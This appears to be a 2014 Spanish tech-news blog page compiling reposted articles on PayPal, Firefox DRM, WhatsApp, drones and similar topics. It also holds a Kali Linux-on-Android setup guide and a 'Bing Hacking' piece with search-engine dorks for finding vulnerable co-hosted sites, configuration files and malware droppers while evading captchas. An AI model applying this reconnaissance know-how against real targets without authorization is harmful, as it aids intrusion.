El director de Paypal: "En cinco años desaparecerán las malditas contraseñas

En cinco años habrán desaparecido las "malditas" contraseñas para operar en internet y serán sustituidas por lectores biométricos en los que las empresas tecnológicas están trabajando, ha dicho a EFE Estanis Martín de Nicolás, director general de la multinacional de pagos por internet Paypal en España.

El directivo ha explicado que el actual sistema de autenticación mediante contraseñas se creo hace 50 años para controlar el tiempo que los estudiantes del MIT (Massachusetts Institute of Technology) utilizaban los ordenadores, pero que en el momento actual constituye "la mayor pesadilla" para los internautas que tienen que manejar numerosas contraseñas y usuarios diferentes para operar de forma segura en la red.

Flappy Bird regresa a las app store como juego multijugador

La adictividad y dificultad de este videojuego ocasionó un primer revuelo cuando apareció en las tiendas online de aplicaciones, pero fue mucho mayor la repercusión que tuvo la decisión de su programador de retirarlo debido a la ansiedad y frustración que “Flappy Bird” ocasionaba entre muchos de sus jugadores. Tras unos meses “retirado” Dong Ngyuen anuncia que volverá a volar su pajarillo pero esta vez permitiendo que varios jugadores a la vez disfruten de la partida.

La noticia se ha confirmado a través de la cuenta en Twitter de la cadena televisiva estadounidense CNBC, una de cuyas periodistas habría recibido personalmente de Dong Nguyen, el creador de “Flappy Bird”, la confirmación del regreso del pájaro más difícil de salvar de la Historia.

El tráfico cifrado (SSL) aumenta considerablemente en Europa y Latinoamérica,...

Cada año por estas fechas, la compañía canadiense Sandvine lanza un nuevo informe sobre cómo ha evolucionado el tráfico de datos a través de la red en los distintos continentes del planeta. En anteriores ocasiones nos llamaba la atención cómo el BitTorrent cada vez acaparaba un mayor volumen de tráfico, pero en la nueva edición hay un detalle muy interesante que destacan en TorrentFreak: el tráfico SSL en Europa ha crecido considerablemente durante los últimos meses.

Mientras que, en la segunda mitad de 2013, el tráfico SSL agregado a través de la red fija suponía un 2.03% en Europa, en los datos de este año la cantidad se ha triplicado y alcanza el 6.10%. Teniendo en cuenta que, justo hace un año, estábamos hablando de un 1.47%, está clara la tendencia al alza actual. En Latinoamérica el crecimiento es aún más acusado: del 1,80% hace un año a el 10,37% actual, mientras que en Norteamérica (de 2,39% a 3,80%) y Asia-Pacífico (de no aparecer a 1,36%) se produce una ligera subida. En África, sin datos de 2013, se sitúa ahora en un 6,77%.

Los motivos por los que los usuarios perdemos con la llegada del DRM a Mozilla...

Mozilla se ha visto obligada a implementar la gestión digital de derechos, DRM por sus siglas en inglés, en su navegador Firefox a través del estándar Encrypted Media Extensions (EME). El apoyo de Google, Microsoft, Opera y Apple a esta medida y la presión de Hollywood, Netflix y otros han provocado que Mozilla haya aceptado a regañadientes incluir el DRM en su navegador, ya que en palabras del director de tecnología de Mozilla, Andreas Gal, “no tenemos otra opción”. El presidente de Mozilla, Mitchel Bakerañadió que “Mozilla no puede cambiar a la industria sobre el DRM en este momento”. La compañía se ha visto obligada a ceder porque consideran que perderían usuarios en caso de no hacerlo. “Los demás navegadores y la industria de contenidos han optado por la especificación W3C EME, por lo que no tenemos más remedio que implementar este estándar”.



Los usuarios son los más perjudicados con el DRM

En realidad los grandes perjudicados por la implementación del DRM en los contenidos son los usuarios. Los técnicos encargados de implementar el DRM lo hacen con reticencia, ya que consideran que es una solución que no aporta prácticamente nada, y lo que hace es dar más problemas. Realmente, se reduce la seguridad de nuestros dispositivos, reduce la confianza de los usuarios, aumenta el número de errores con riesgo, acaba con la competitividad, elimina los derechos de uso justo y evita que se desarrollen estándares abiertos. Estas desventajas hacen que sean los usuarios los más perjudicados, ya que principalmente no podemos compartir los contenidos ente nuestros dispositivos de forma libre. Para Mozilla, “el DRM actual suele ser una carga excesiva y restringe a los usuarios a la hora de reproducir un contenido, comprado legalmente, en varios dispositivos”. La compañía propone utilizar otro sistema de protección más justo, como el de marcas de aguas invisibles (watermarking) que permitiría a los usuarios compartir sus contenidos entre varios dispositivos, pero no de forma masiva.



Mozilla tenía miedo de perder usuarios

El resto de compañías ya han aprobado la especificación W3C EME para sus navegadores, por lo que los máximos rivales de Firefox,es decir, Internet Explorer y Chrome, pueden reproducir sin problemas los contenidos de Netflix, por ejemplo. Es por eso que Mozilla ha decidido implementar el estándar por temor a quedarse sin clientes. De todas formas, la compañía ha pensado en desarrollar una solución que cumpla con el estándar, pero a la vez sea coherente con sus principios y con las libertades de los usuarios, por lo que han firmado con acuerdo con Adobe, la cual hace algo similar con la tecnología Flash. La implementación de Mozilla permitiría activar y desactivar el DRM sin problemas, por lo que la decisión final estaría en manos de los usuarios y no estaría incluido por defecto. Mozilla también introduciría el código del DRM dentro de pieza de software de código abierto que podría ser modificada por cualquiera, por lo que no sería código cerrado totalmente

Fuente: http://www.adslzone.net/2014/05/15/los-motivos-por-los-que-los-usuarios-perdemos-con-la-llegada-del-drm-mozilla-firefox/

WhatsApp ya funciona tras un nuevo fallo del servicio

La última caída grave del servicio, que la red social Facebook adquirió por 19.000 millones de dólares, se produjo el pasado febrero

Barcelona (Redacción).- El servicio de mensajería móvil WhatsApp vuelve a funcionar tras un nuevo fallo del servicio. Usuarios en las redes sociales se han hecho eco a primera hora de la mañana de este jueves de la caída. La compañía, en su cuenta de Twitter, no ha comunicado por el momento la razón de los problemas en el servicio.

La última caída grave de WhatsApp, que la red social Facebook adquirió por 19.000 millones de dólares, se produjo el pasado febrero y ocasionó una lluvia de quejas por el fallo.

WhatsApp tiene unos 450 millones de usuarios mensuales en activo, el 70 por ciento de ellos activos a diario. La popularidad del servicio se debe a que cada vez más usuarios de móvil han optado por esta opción de mensajería frente a los tradicionales SMS.

El perfil de esa aplicación se elevó aún más desde que se anunció su compra por parte de Facebook, con una generosa oferta que es la mayor de la compañía hasta la fecha y está muy por encima de los 1.000 millones que pagó en 2012 por la red social de fotos Instagram.

«Watch Dogs»: cómo «hackear» la ciudad para convertirla en un arma

Es uno de los juegos más esperados del año. «Watch Dogs», que saldrá finalmente a la venta el próximo 27 de mayo para las consolas PlayStation 3, PlayStation 4, Xbox 360 y Xbox One además de contar con versión para PC, permitirá controlar por parte del jugador todo tipo de sistemas informáticos para convertirlo en un arma.

La propuesta de mundo abierto de Ubisoft, que estará en el segmento de juegos como el exitoso «Grand Theft Auto V», se centrará en la ciudad de Chicago, con seis distritos donde Aiden Pearce, el personaje principal del juego, es un «hacker» brillante cuyo pasado criminar le llevó a sufrir una vilenta tragedia familiar.



Esto es lo que ocurre si intentas escanear un billete de 10 euros

¿Han intentado alguna vez escanear o fotocopiar un billete de curso legal? Hagan la prueba. Cojan uno de cualquier valor (mejor que esté en buen estado) e intenten reproducirlo en su casa, o en la oficina, o donde tengan a mano un escáner o una fotocopiadora. En Teknautas lo hemos intentado con un billete de 10 euros.

Comprobarán que el resultado es peculiar: algunos equipos oscurecen la imagen hasta hacerla casi indistinguible, otros la cruzan con líneas moradas. Esto ocurre también en muchos casos (aunque no en todos, depende del equipo que utilicemos) si descargamos una imagen de un billete de internet y la queremos procesar con Photoshop o herramientas similares. El programa nos lanza un aviso, advirtiendo que "no acepta el procesamiento no autorizado de imágenes de billetes de banco".

http://www.elconfidencial.com/tecnologia/2014-05-14/esto-es-lo-que-ocurre-si-intentas-escanear-un-billete-de-10-euros_130325/

sábado, 10 de mayo de 2014

kali linux en android


Kali Linux en Android usando Linux Deploy




Conseguir que Kali Linux se ejecute en hardware ARM ha sido un objetivo importante para nosotros desde el primer día. Hasta ahora, hemos construido imágenes nativas para el Samsung Chromebook, U2 ODROID, Raspberry Pi, RK3306, Galaxy Note 10.1, CUbox, Efika MX, y BEAGLEBONE para nombrar unos pocos. Sin embargo, esto no significa que usted no pueda instalar Linux en un Kali chroot en casi cualquier dispositivo moderno que corre Android. De hecho, los desarrolladores de Linux Deploy han hecho que sea extremadamente fácil de conseguir cualquier número de distribuciones Linux instaladas en un entorno chroot usando un simple constructor de GUI.

Requerimientos Previos:
* Un dispositivo con Android 4.0.1 o superior.
* Al menos 5 GB de espacio libre en el almacenamiento interno o externo.
* Conexión a Internet inalámbrica rápida.
* Paciencia para esperar una distribución para arrancar desde la red.


CONFIGURACIÓN DE LINUX DEPLOY PARA KALI





De hecho, hay muy poco que hacer para conseguir a Kali en nuestro dispositivo. Al elegir Kali Linux en la " Dicha de Distribución ", que ha cubierto prácticamente las cosas importantes. Opcionalmente, usted puede elegir su arquitectura, ajuste el tipo de instalación y la ubicación de su dispositivo Android, etc. Por lo general, los valores por defecto proporcionadas por Linux Deploy son buenos para empezar.

LA CONSTRUCCIÓN DE LA IMAGEN DE KALI





Una vez que esté satisfecho con todos los ajustes, golpeando el botón "Instalar" se iniciará un Kali Linux Bootstrapdirectamente desde nuestros repositorios. Dependiendo de su velocidad de conexión a Internet, este proceso podría tardar un poco. Vas a ser la descarga de una instalación base de Kali Linux (sin herramientas) como mínimo.

PUESTA EN MARCHA DE SU KALI CHROOT


Una vez que la instalación se haya completado, se puede tener Linux Deploy monta automáticamente y cargar su imagen chroot Kali Linux. Esto también incluye la puesta en marcha de servicios como SSH y VNC para el acceso remoto más fácil. Todo esto se hace automágicamente golpeando " inicio botón ". Usted debe ver a Linux Implementar la creación de su imagen con una salida similar a la siguiente:




En esta etapa, Linux Deploy ha iniciado un VNC y el servidor SSH su imagen Kali chroot dentro. Puede conectarse a la sesión de Kali remota utilizando la dirección IP asignada a su dispositivo Android (en mi caso, 10.0.0.10).

INICIO DE SESIÓN EN SU KALI CHROOT


Ahora usted puede utilizar un cliente VNC o SSH para acceder a la instancia de Kali. La contraseña VNC es " changeme " y las credenciales SSH son " android " para el nombre de usuario (configurado a través de Linux Deploy) y " changeme " como contraseña.


Código: [Seleccionar]

muts@slim:~$ ssh android@10.0.0.10
android@10.0.0.10 password:
Linux localhost 3.4.5-447845 #1 SMP PREEMPT Fri Apr 12 17:22:34 KST 2013 armv7l
Kali GNU/Linux 1.0 [running on Android via Linux Deploy]
android@localhost:~$ sudo su
root@localhost:/home/android# df
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/loop3 4180944 667268 3304012 17% /
tmpfs 952708 80 952628 1% /dev
tmpfs 952708 0 952708 0% /dev/shm
root@localhost:/home/android#
root@localhost:/home/android# apt-get update
Hit http://http.kali.org kali Release.gpg
Hit http://http.kali.org kali Release
Hit http://http.kali.org kali/main Sources
Hit http://http.kali.org kali/contrib Sources
Hit http://http.kali.org kali/non-free Sources
Hit http://http.kali.org kali/main armel Packages
Hit http://http.kali.org kali/contrib armel Packages
Hit http://http.kali.org kali/non-free armel Packages
Ign http://http.kali.org kali/contrib Translation-en_US
Ign http://http.kali.org kali/contrib Translation-en
Ign http://http.kali.org kali/main Translation-en_US
Ign http://http.kali.org kali/main Translation-en
Ign http://http.kali.org kali/non-free Translation-en_US
Ign http://http.kali.org kali/non-free Translation-en
Reading package lists... Done
root@localhost:/home/android#

CONSIDERACIONES DE TAMAÑO DE IMAGEN


Si se deja sin cambios, Linux Deploy establecerá automáticamente un tamaño de imagen de alrededor de 4 GB, para una instalación de "desnudo" de Kali. Si usted desea instalar herramientas de Kali adicionales en el futuro, es posible que desee considerar el uso de un tamaño de imagen mayor, que es configurable a través de la configuración de Linux en Implementar.

LAS CONEXIONES VNC LOCALES

Tuvimos que probar un par de clientes VNC para conseguir uno que funcione correctamente. Aunque el control de Kali a través de un cliente local VNC no es la más conveniente de las tareas, es ciertamente posible. Sin embargo, sospechamos que la mayoría de la gente va a SSH'ing en este caso. La foto de abajo se cubrió con un escritorio de pantalla Kali Linux tomada de un S4 Galaxy.





Un estudio nos revela los mejores antivirus para Windows de 2014

Si actualmente estás buscando un antivirus que satisfaga tus necesidades para proteger correctamente tu ordenador con sistema operativo Windows, sigue leyendo porque vamos a repasar los mejores antivirus de 2014 para el sistema operativo de Microsoft, según un estudio de la empresa Dennis Technology Labs.

Dennis Technology Labs es un laboratorio de pruebas independiente que evalúa la tecnología personal y de negocios, incluyendo hardware y software. Están especializados en pruebas de seguridad para las que utilizan un importante marco de pruebas anti-malware. Recientemente, han publicado un nuevo estudio sobre la eficacia de los antivirus que nos podemos encontrar actualmente en el mercado, estudio que revela que el Kaspersky Internet Security 2014 es el mejor antivirus que nos podemos encontrar, ya que ha protegido correctamente el 100 % de los ordenadores utilizados en la investigación con una precisión legítima y total del 100 %.

http://www.adslzone.net/2014/05/10/un-estudio-nos-revela-los-mejores-antivirus-para-windows-de-2014/

Arabia Saudí condena a 10 años de cárcel y mil latigazos a un bloguero por ...

Un tribunal saudí ha condenado este miércoles al bloguero Raif Badawi, quien se encuentra en estos momentos en prisión, a una pena de diez años de prisión y mil latigazos por "insultar al Islam" y crear un foro liberal en Internet. Además, deberá pagar una multa de un millón de riales (unos 191.600 euros).

La sentencia ha sido formulada después de que Badawi viera rechazada su apelación a una condena previa a siete años de cárcel y 600 latigazospor estos mismos cargos, según ha informado el diario saudí 'Arab News'. El año pasado fue absuelto de los cargos de apostasía, que hubieran implicado la pena de muerte.

Los problemas legales de Badawi empezaron en 2008 poco después de abrir la página web Red Liberal Saudí, tras lo que fue detenido durante un día e interrogado acerca de los contenidos. La organización no gubernamental Amnistía Internacional (AI) ha criticado el "vergonzoso" veredicto y ha definido al bloguero como "un prisionero de conciencia que sólo es culpable de atreverse a crear un foro público de discusión y de ejercer pacíficamente su derecho a la libertad de expresión".


"Las autoridades deben revocar la condena y liberarle de forma inmediata e incondicional", ha dicho el director del programa para Oriente Próximo y Norte de África de la organización, Philip Luther.

"Raif Badawi es la última víctima de una campaña implacable para silenciar a los activistas pacíficos en Arabia Saudí. Las autoridades parecen decididas a aplastar todo tipo de oposición a través de todos los medios a su alcance, incluyendo duras condenas de cárcel y castigos físicos", ha remachado.

http://www.libertaddigital.com/internacional/mundo/2014-05-09/condenan-a-un-bloguero-a-10-anos-de-carcel-y-mil-latigazos-por-insultar-al-islam-1276518076/

Avión de pasajeros a punto de colisionar con un drone

Publicado el 10 de mayo de 2014 por Antonio Rentero

Hace unos meses tuvo lugar un incidente, afortunadamente sin consecuencias, cuando un avión de línea regular encontró en su trayectoria un drone que sobrevolaba las cercanías del aeropuerto de Tallahassee (Florida).

En una conferencia celebrada en San Francisco esta semana sobre seguridad aérea relacionada con el uso de drones Jim Williams, director de la oficina encargada de supervisar el tráfico aéreo no tripulado en la Administración Federal de Aviación hizo público el incidente que tuvo lugar el pasado 22 de marzo en las proximidades de un aeropuerto de Florida.

Un avión de la compañía American Airlines informó de la presencia de un drone peligrosamente cerca de su trayectoria. De hecho el piloto comunicó que estaba casi seguro de que había impactado contra el fuselaje del avión, aunque finalmente se comprobó que no llegó a producirse la colisión.

El problema, según expuso Williams, no es el choque en sí contra el avión, dado que los drones de pequeño con una cámara a bordo empleados para fotografía aérea o grabación de vídeo desde esas alturas saldrían peor parados. El auténtico peligro está en que el drone sea engullido por la turbina del avión, lo que sí podría ocasionar un grave daño, incluso producir el fallo del motor con el potencial peligro para la aeronave y su pasaje.

En alguna ocasión ha sucedido con pájaros de gran tamaño, aunque en el caso de los drones el peligro aumentaría por la presencia de piezas bastante más duras que los huesos y la carne de un ave. La normativa obliga a que una nave tripulada mantenga una distancia de separación de al menos 300 metros en vertical y varios kilómetros en horizontal.

El incidente parece ser el primero de que se tiene noticia en Estados Unidos de riesgo de colisión entre un avión y un drone, aunque sí hay ya unos cuantos informes de avistamientos de drones desde aeronaves en vuelo. En marzo de 2013 un avión de Alitalia en aproximación al aeropuerto JFK de Nueva York detectó un drone a unos 60 metros de distancia, incidente que está aún siendo investigado por el FBI.

En el caso del incidente en Florida, el piloto informó de que el drone tenía aspecto de avión, no de helicóptero de múltiples hélices, y que estaba pintado de camuflaje, con lo que no coincidiría con un drone militar puesto que estos no incluyen ese tipo de pintura.

Gretchen West, desde la Asociación de Vehículos No Tripulados, afirma que la mayoría de los pilotos de drones los manejan con responsabilidad y cumpliendo normas básicas de seguridad, pero recuerda que hay lagunas legales por parte de la administración aeronáutica estadounidense con respecto al uso recreacional de drones, lo que puede llevar a sucesos de esta naturaleza.

La FAA ha autorizado a más de 500 entidades públicas como departamentos de policía a usar drones (siempre volando a alturas inferiores a 120 metros) pero sólo hay dos drones que oficialmente cuentan con autorización para volar con fines comerciales, y ambos en las costas de Alaska. Mientras, un gran número de empresas e individuos continúan manejando estos aparatos con fines comerciales y, en la práctica, al margen de la ley.

vINQulo

The Wall Street Journal

viernes, 9 de mayo de 2014

Los Cuadernos de Hack x Crack (Viejos & Nuevos)

Los Cuadernos de Hack x Crack (Viejos & Nuevos)



Todo aquel que se inicio hace tiempo en el tema de la seguridad informática (Hacking), se acordaran de los ultra conocidos Cuardernos de Hack x Crack que era en aquel tiempo, hace 10 años, un excelente material en español y muy claro, llegaron a las 30 ediciones y su última versión fue lanzada en septiembre del 2005 (nunca más lanzaron ediciones de estos prometedores cuadernillos por motivos que desconozco)...

Hace ya un tiempo se abrió una comunidad en español sobre esta misma revista donde se hablan principalmente temas de seguridad informática y también han publicado con la ayuda de la comunidad nuevos cuadernos (claro que no son la misma editorial de la vieja HackxCrack).

Estos nuevos cuadernos son tutoriales que tratan temáticas actuales sobre este basto mundo de la informática, que son muy claros y especial para novatos en el tema.

Cuadernos de Hack x Crack Nuevos

Ya está disponible oficialmente Mozilla Firefox 29.0.1

Hace unos días Mozilla lanzó Firefox 29 con muchos cambios incluida la nueva interfaz denominada Australis que recuerda al navegador Chrome de Google y que ha supuesto el mayor cambio del popular navegador en mucho tiempo. En esta nueva versión se corrigen varios errores de seguridad detectados.

Mozilla ha lanzado oficialmente la primera actualización de la nueva versión de su navegador que ya alcanza la número 29. Hace unos pocos días era lanzado el esperado Firefox 29 con la nueva interfaz denominada Australis que no dejó a nadie indiferente. Por una parte, ha sido alabada por los usuarios debido a que mejora la usabilidad y comodidad del navegador, pero por otra ha sido criticada por su parecido al popular navegador Chrome de Google perdiendo su esencia. Ahora Mozilla ha lanzado la versión 29.0.1 para corregir varios errores detectados en la versión inicial, la primera estable que implementa la nueva interfaz Australis. Los usuarios de Linux que tenga Firefox 29 no tienen que hacer nada para instalar esta actualización, ya que es muy probable que llegue en los repositorios. También se pueden descargar los binarios y ejecutar el programa sin necesidad de instalar nada, como siempre, pero hay que tener cuidado porque pueden surgir problemas si se ejecutan dos versiones diferentes de Firefox a la vez. Por el momento, Mozilla no ha publicado los detalles con los cambios que implementa la actualización, por lo que nos queda probar el navegador para comprobar su funcionamiento a la espera de que lancen dichos detalles.

http://www.adslzone.net/2014/05/09/ya-esta-disponible-oficialmente-mozilla-firefox-29-0-1/

Un juez ordena a un padre que deje de enviar ‘emails’ en mayúsculas a sus hijos

El título del post lo dice todo… Una vez más una sentencia judicial me deja con la boca abierta. Aunque no lo voy a negar, estoy totalmente a favor de la misma. ¿O hay alguien en la ‘sala’ que le guste recibir mensajes repletos de mayúsculas? Es realmente un horror. Parece que te están gritando o tecleando a martillazos cada una de las letras.

Por esta razón de peso, un magistrado del Tribunal Superior de Inglaterra describió en la sentencia del caso que el padre era insensible por cometer semejante acto atroz (un poco exagerado, pero ya sabemos como es a veces el lenguaje judicial). Además, obligó al progenitor que dejara de hacerlo ya que parecía que estaba bramando a sus hijos a través de la Red.

http://blogs.20minutos.es/becario/2014/05/09/un-juez-ordena-a-un-padre-que-deje-de-enviar-emails-en-mayusculas-a-sus-hijos/

Google quiere atraer a Chrome OS a los usuarios de Windows XP

Google está añadiendo en su sistema operativo basado en web Chrome OS funcionalidades offline con el objetivo de atraer a los usuarios de Windows XP que todavía recelan de actualizar a una versión más moderna del sistema de Microsoft. Play Movies pasa a ser offline y se podrán ver videos sin conexión a Internet.

Los de Mountain View quieren aprovechar el fin del soporte de Windows XP para atraer a sus usuarios y cada vez están añadiendo más funcionalidades offline a Chrome OS, su sistema operativo basado en web para dispositivos de escritorio. Este sistema operativo, cuyo anuncio de su desarrollo se remonta al 7 de julio de 2009, está basado en código abierto con núcleo Linux y enfocado principalmente a dispositivos de escritorio portátiles. Su lanzamiento se produjo en junio de 2011 y poco a poco ha ido ganando algo de terreno, aunque la cuota de mercado de los ordenadores que utilizan este sistema es muy pequeña actualmente. La característica principal de Chrome OS y, posiblemente a su vez, gran desventaja es que originalmente era necesario estar conectado a Internet en todo momento para que todas las características del sistema funcionaran correctamente. Google ha ido poco a poco añadiendo funciones offline, es decir, que no requieren conexión a Internet, y desde los últimos meses ha aumentado el ritmo con el objetivo de atraer a aquellos usuarios de Windows XP que tras el fin del soporte de este sistema no están convencidos para actualizar a otra versión más moderna.

http://www.adslzone.net/2014/05/09/google-quiere-atraer-chrome-os-los-usuarios-de-windows-xp/

Los usuarios de iPhone beben vino y viajan en avión, los Android comen en ...

La diferencia entre las características de los usuarios de iPhone y los de Android ha sido protagonista de diversos estudios. Pero ahora, ante el crecimiento de la publicidad móvil y su impacto, desde Battery Ventures decidieron realizar su propia investigación para tener un acercamiento más.

La página Re/Code habló con Jonathan Sills, el encargado de Battery Ventures en hacer el estudio, y le dio algunas pistas de su investigación.

http://www.abc.es/tecnologia/moviles-telefonia/20140509/abci-iphone-vino-avion-android-201405091836.html

miércoles, 7 de mayo de 2014

¿Bing es mejor que Google?

Aunque a muchos les suene a anatema, Google, aún siendo quizá el mejor buscador de contenidos y de gran utilidad no es perfecto. Si bien Bing debe aprender muchas cosas de Google, en este artículo voy a recoger algunas de las cosas en las que Google hace agua y debería mejorar.

1.- Filetype y Extensión

La primera de las cosas que debe mejorar Google ya la sabéis, porque de ella hablé tiempo ha, y es la implementación del operador filetype como tal, y no como está actualmente, que es solo un sobrenombre del operador ext. Es decir, si se buscan ficheros de filetype:doc, realmente está buscando URLS en las que la extensión del fichero acabé en .doc.

Figura 1: Búsqueda de ficheros filetype:PDF en psoe.es en Google

Como se puede ver, solo devuelve aquellos que tengan la extension del fichero en .pdf. Ahora buscamos por filetype do, y se puede ver como aparecen ficheros con extensión do que devuelven PDF.


Figura 2: Búsqueda de ficheros filetype:do en psoe.es en Google

Sin embargo, si se hace en BING, se obtienen tanto los que tienen extensión pdf, como los que son devueltos por aplicaciones, siempre que el tipo del fichero sea PDF.


Figura 3: Búsqueda de ficheros filetype:PDF en psoe.es usando BING

Por desgracia BING solo reconoce algunos de los filetypes más comunes, como ya os puse en el artículo de Bing Hacking. Además, en BING no se puede hacer uso del operador extensión, lo que tan buenos resultados da a veces en Google para buscar ficheros ocultos de UNIX o los .listing.

2.- Análisis de binarios

Esta característica es muy especial en BING y es bastante curiosa ya que BING está indexando ficheros ejecutables, objetos OCX, ActiveX o DLLs, haciendo algo muy, muy, muy curioso: Analizarlos. De esta forma es posible buscar ficheros OCX haciendo uso del truco que os conté en Bing Hacking de hacer uso del filetype:txt.


Figura 4: Búsqueda de OCX en BING, se puede ver los strings


Si se mira la caché de la indexación del fichero en BING se accede a una cosa muy chula como son los métodos que exporta, las funciones que utiliza a nivel de kernel o user, las librerías que importa y las secciones que contiene el binario. Muy curioso.


Figura 5: Parte del análisis que indexa BING

De esta manera, por ejemplo, podemos buscar ficheros ejecutables y descubrir malware. Para hacer esta prueba hemos ido a descubrir malware con droppers publicados en Internet. Lo que hemos hecho ha sido un dork para BING buscado ficheros ejecutables (com, exe, src), tal y como éste:


Figura 6: Buscando ejecutables en BING

Después hemos buscado uno de los métodos utilizados por los droppers como por ejemplo URLDownloadToFileA y aparecen algunos muy chulo.


Figura 7: Buscando ejecutables que usen el método URLDownloadToFile en BING


Después, para comprobar la suposición, hemos mandado la URL de uno de ellos a VirusTotal... et voila.


Figura 8: Malware, como era esperado.

Google, directamente no hace ninguna indexación de estos ficheros más allá de la URL y de aquellos que actúan como un CGI. ¿A que mola esta función de BING?


Como hay mucha gente que no lo utiliza, y alguno se ha escandalizado y todo porque en un programa de TV dije que "Bing es uno de los mejores buscadores", hoy he decidido dejaros 10 motivos por los que debes pensar en hacer Bing Hackingtambién:

1.- Tiene soporte del operador IP: Esto te permite encontrar otros sitios web - tal vez vulnerables - alojados en la misma dirección IP de un objetivo en un proceso de pentesting. Puede ser que no estén alojados en el mismo servidor y que sea solo un proxy inverso, pero si están en el mismo servidor, aparecerán al usar el operador IP.

2.- Implementa correctamente el operador EXT y Filetype: Aunque no lo creas, Google no lo hace. Para Google, tanto EXT con Filetype son lo mismo, cuando no es así. Si buscas en Bing con el operador EXT dará resultados cuyos ficheros acaben en la extensión que decidas. Si usas Filetype lo hará por el tipo de fichero - no importa la extensión que tenga -. En Google tanto Filetype como EXT devuelven ficheros que tengan esa extensión.

3.- No indexa los mismos resultados que Google: A pesar de que la gente piensa queBing indexa menos que Google, no es solo así. A veces se indexan resultados distintos debido a múltiples factores, como a la forma en la que siguen los enlaces basados en campos de formularios, lo que hace que el motor de spideringencuentre cosas distintas.

4.- Implementa el operador Contains: Ya os he hablado de él, pero la posibilidad de encontrar páginas con enlaces a ficheros con una extensión concreta es de gran utilidad. Yo lo utilizo, por ejemplo, para encontrar páginas a ficheros de configuraciónCitrix.

5.- Indexa el contenido de ficheros empaquetados: Se pueden encontrar ficheros que estén dentro de un archivo comprimido o empaquetado, lo que puede arrojar más resultados a la hora de buscar ficheros raros en Internet.

6.- No implementan de igual forma el fichero robots.txt: Esto tiene impacto cuando por ejemplo haya una configuración específica para Google Bot y otra para el motor deBing, pero también a que los webmasters hagan solo una configuración general y en esos casos la forma en que interpretan un fichero robots.txt se haga de forma distinta, con lo que podría llevar a que en Bing aparezcan - wait for it - resultados que no están indexados en Google.

7.- La detección de búsquedas automáticas es más relajada: Debido a que Google es el motor que principalmente se usa para todas las herramientas de búsqueda automática de objetivos, Bing no muestra el captcha con tanta rapidez, lo que permite jugar más a gusto durante largo tiempo con los dorks. En FOCA, usar Bing evita que salga ningún captcha.

8.- No es común el Bing Hacking: Casi todos los libros y referencias de hacking con buscadores son sobre Google Hacking y no sobre Bing Hacking, con lo que los resultados que se obtienen a través de Bing no están tan "trillados". Es posible encontrar cosas chulas en poco espacio de tiempo.

9.- Tiene comandos distintos: Google y Bing no tienen exactamente los mismos operadores, como se ha visto ya con Filetype, Contains o IP. En Bing hay algunos como feed, prefer, loc o hashfeed para hacer búsquedas más concretas que te pueden venir bien en algún caso.

10.- No hay excusa para no hacerlo: Puedes enfadarte y negarte a usarlo, pero no hay ninguna razón para no utilizarlo si te puede dar más información. Cuando buscas información debes utilizar todas las fuentes que te vengan bien, desde Google aDuckDuckGo, pasando por Robtex, Shodan, Exalead o ... Bing. Herramientas como FOCA o Maltego utilizan todas las fuentes posibles, no usarlas... es de necios.





Fuente:http://www.elladodelmal.com/2013/04/10-motivos-por-los-que-debes-pensar-en.html
http://jadcode.blogspot.com.es/2013/04/bing-hace-mejor-que-google-el-chema.html

Windows 9 podría estar basado en la nube potenciando el uso de Bing

Aunque Microsoft se encuentra trabajando en la segunda actualización de Windows 8.1, que previsiblemente verá la luz en agosto, todos los ojos están puestos en la próxima versión completa del sistema operativo, la cual posiblemente sea llamada Windows 9. Estaría basada en la nube potenciando el uso de Bing y está previsto que sea lanzada en primavera de 2015.

Por el momento, no hay ningún detalle confirmado sobre la próxima iteración del sistema operativo de Microsoft, pero varias personas familiarizadas con este asunto han dicho en varias ocasiones que Windows 9 podría centrarse en el uso de la nube. Incluso hay fuentes que sugieren que existiría una versión bajo suscripción para poder disfrutar de la versión completa y que ésta estaría totalmente basada en la nube. Ahora, un empleado de Microsoft ha dicho en una reciente entrevista que “centrarse en la nube” es una prioridad para el gigante de software actualmente.

http://www.adslzone.net/2014/05/07/windows-9-podria-estar-basado-en-la-nube-potenciando-el-uso-de-bing/

Google Street View inunda ciudades de todo el mundo para promover el Día ....

Los efectos del cambio climático son muchos y variados: variación de las precipitaciones, aumento de las temperaturas, deshielo, enfermedades, pérdidas económicas, problemas en el suministro de agua, etc. Google Street View nos muestra uno de ellos inundando ciudades de todo el mundo.

Para promover el Día Mundial del Medio Ambiente, que se celebra el 5 de junio, la plataforma de crowdfunding para proyectos ambientales, CarbonStory, se ha asociado con las agencias de marketing BDDO y Proximity Singapore para crear un sitio interactivo llamado World Under Water.

Desarrollado por Google Maps y exclusivo de Chrome, este sitio te permite elegir cualquier ubicación de Street View y ver lo que se verá después de que los niveles del mar suban.

La aplicación es simple. El sitio web usa el mismo efecto para cada ubicación y el nivel del mar no cambia en función de la geografía. Podemos elegir entre Yucatán, Nueva York, Barcelona, París, Dubai, Londres, Roma, Moscú, etc.

Cuando se termina de visualizar la inundación de la ciudad, World Under Water te permite compartir la ubicación de Street View de la ciudad sumergida en Facebook y Twitter, además de ofrecer consejos sobre cómo reducir las emisiones de carbono.

http://www.iblnews.com/story/82603

La tarjeta de visita definitiva para los Apple fanboys: una pantalla de iPhone

Quedarán pocas dudas sobre tus preferencias tecnológicas cuando entregues a un contacto o potencial cliente una tarjeta de visita como la que os mostramos en la siguiente imagen y que pertenece a un ingeniero de (no podía ser de otra forma) la empresa Apple. Una pantalla original de iPhone (la parte transparente superior, hecha con el famoso cristal Gorilla Glass) con una inscripción láser será una de las pocas tarjetas de visita de las que te cueste desprenderte.

En todo encuentro profesional en el que se precie se producen múltiples presentaciones esa rutina de intercambiar tarjetas de visita (algo llevado al extremo en “American Psycho“) como forma de dejar algo de huella en nuestros contactos. La inmensa mayoría de dichas tarjetas terminan desechadas y sólo unas pocas escogidas terminan guardadas no tanto por utilidad (que es de lo que se trata) como por la originalidad de la misma en diseño, forma, material…


http://www.theinquirer.es/2014/05/07/la-tarjeta-de-visita-definitiva-para-los-apple-fanboys-una-pantalla-de-iphone.html

Un joven, condenado a pedir perdón a la cara a Cifuentes

